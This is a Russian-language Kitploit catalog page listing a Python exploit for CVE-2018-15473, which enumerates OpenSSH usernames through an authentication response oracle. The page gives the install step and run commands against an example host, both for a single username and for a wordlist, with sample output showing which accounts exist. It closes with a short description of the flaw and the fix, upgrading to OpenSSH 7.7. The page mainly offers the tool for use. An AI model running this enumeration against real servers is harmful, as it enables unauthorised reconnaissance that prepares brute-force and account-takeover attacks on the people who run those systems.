Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-15473 — Эксплойт на Python для CVE-2018-15473, позволяющий перечисление пользователей OpenSSH через оракул ответа аутентификации, с режимами для одного пользователя и словаря. | Kitploit
Инструменты/GitHubGitHub/0xrobiul/cve-2018-15473
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииСетевая безопасностьТестирование на Проникновение
GitHub0xrobiul/cve-2018-15473

CVE-2018-15473

Эксплойт на Python для CVE-2018-15473, позволяющий перечисление пользователей OpenSSH через оракул ответа аутентификации, с режимами для одного пользователя и словаря.

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-15473

SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)

Отредактированная версия оригинального эксплойта: https://www.exploit-db.com/exploits/45233

  • Переведено на Python3

  • Добавлена опция списка имён пользователей

Как запустить

root@kitploit:~

#Установка зависимостей:

foo@bar:~$ pip3 install -r requirements.txt

root@kitploit:~

#Для одного имени пользователя:

foo@bar:~$ ./Exploit.py 192.168.1.20 -u root

[+] root — существующий пользователь

root@kitploit:~

#Для нескольких имён пользователей:

foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt

[+] root — существующий пользователь

[-] mysql — несуществующий пользователь

[-] mike — несуществующий пользователь

[-] foo — несуществующий пользователь

[-] bar — несуществующий пользователь

Существующие пользователи: 

root

root@kitploit:~

#Для дополнительных опций:

foo@bar:~$ ./Exploit.py -h

Об уязвимости:

Система по-разному реагирует на успешные и неуспешные попытки аутентификации. Удалённый пользователь может отправлять специально сформированные запросы для определения существующих имён пользователей на целевой системе. Таким образом, удалённый пользователь может определить существующие имена пользователей на целевой системе.

Решение:

Сервер OpenSSH должен быть обновлён до версии 7.7 или выше.

Скачать инструмент